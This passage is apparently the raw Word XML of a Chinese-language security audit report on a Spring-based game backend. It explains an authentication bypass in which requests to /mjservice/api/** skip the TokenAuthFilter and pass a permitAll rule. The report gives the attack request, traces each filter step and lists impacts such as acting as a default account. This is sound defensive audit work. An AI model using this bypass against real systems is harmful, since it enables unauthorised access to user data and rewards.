          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 类游戏操作、积分领取、奖励发放等接口同样尝试，以未登录匿名身份触发业务逻辑；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 未被注入（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 未执行），控制器层获取到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> userId，根据各接口对 null 的处理逻辑，可能导致以下结果之一：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>以系统级别/默认账户身份执行（高危）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NPE 触发异常业务分支（拒绝服务或逻辑绕过）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>绕过按用户隔离的数据权限校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="7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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="72"/>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完全匿名，无需任何凭证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">前置条件：应用部署时未将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 配置为 Servlet context-path（即 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>server.servlet.context-path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不等于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），且业务控制器存在映射至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的接口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SecurityConfig.isPermitPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中显式声明此前缀为放行路径，强烈表明该条件在当前部署环境中成立。</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74"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>自身</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audit_m030_038_getNormalizedPath_ctrl-self.md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：TokenAuthFilter.java#isNoTokenPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_5" w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞4：Token 认证过滤器白名单逻辑覆盖缺口导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 认证绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="7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 xml:space="preserve">：TokenAuthFilter 路径匹配不完整导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径绕过 Token 认证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="7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src/main/java/com/gameBack/mjservice/config/TokenAuthFilter.java:isNoTokenPath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="7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：认证绕过（Authentication Bypass）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="7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：未授权（无需任何凭证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="8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isNoTokenPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法的核心逻辑如下：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若路径不以 /api/ 开头 → 直接返回 true（跳过 Token 校验）</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>若路径以 /api/ 开头   → 白名单匹配后决定是否放行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>然而，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SecurityConfig.isPermitPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>明确</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径加入了 Spring Security 的 permitAll 规则（第三个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>startsWith</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分支）。这两者结合产生了如下认证空洞：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55"/>
        <w:gridCol w:w="1770"/>
        <w:gridCol w:w="1770"/>
        <w:gridCol w:w="1770"/>
      </w:tblGrid>
      <w:tr>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路径</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b w:val="true"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>isNoTokenPath</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 结果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Spring Security </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>PERMIT_MATCHER</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 结果</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最终效果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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/api/user/profile</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r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>（需鉴权）</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放行</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Token 被校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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/mjservice/api/user/profile</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`true`（跳过 TokenAuthFilter）</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放行</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完全绕过认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Order(-200)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）运行于 Spring Security FilterChainProxy（默认 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Order(-100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）之前，当 </w:t>
      </w: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 xml:space="preserve"> 时，过滤器整体跳过，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 属性不会被写入 request，而 Spring Security 层面也无阻拦，请求直接到达 Controller。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="8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攻击请求 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /mjservice/api/&lt;任意受保护端点&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进入过滤器链：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shouldNotFilter(request)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被调用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>decodedPath = "/mjservice/api/user/profile"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无路径穿越字符，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>containsPathTraversal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>normalizedPath = "/mjservice/api/user/profile"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isNoTokenPath("/mjservice/api/user/profile")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"/mjservice/api/...".startsWith("/api/")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`false`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 直接 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`return true`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（跳过过滤器）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pP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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>doFilterInternal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 永远不执行，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不被写入 request attribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求到达 Spring Security，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PERMIT_MATCHER.matches(request)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isPermitPath("/mjservice/api/...")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>normalizedPath.startsWith("/mjservice/api/")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`true`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
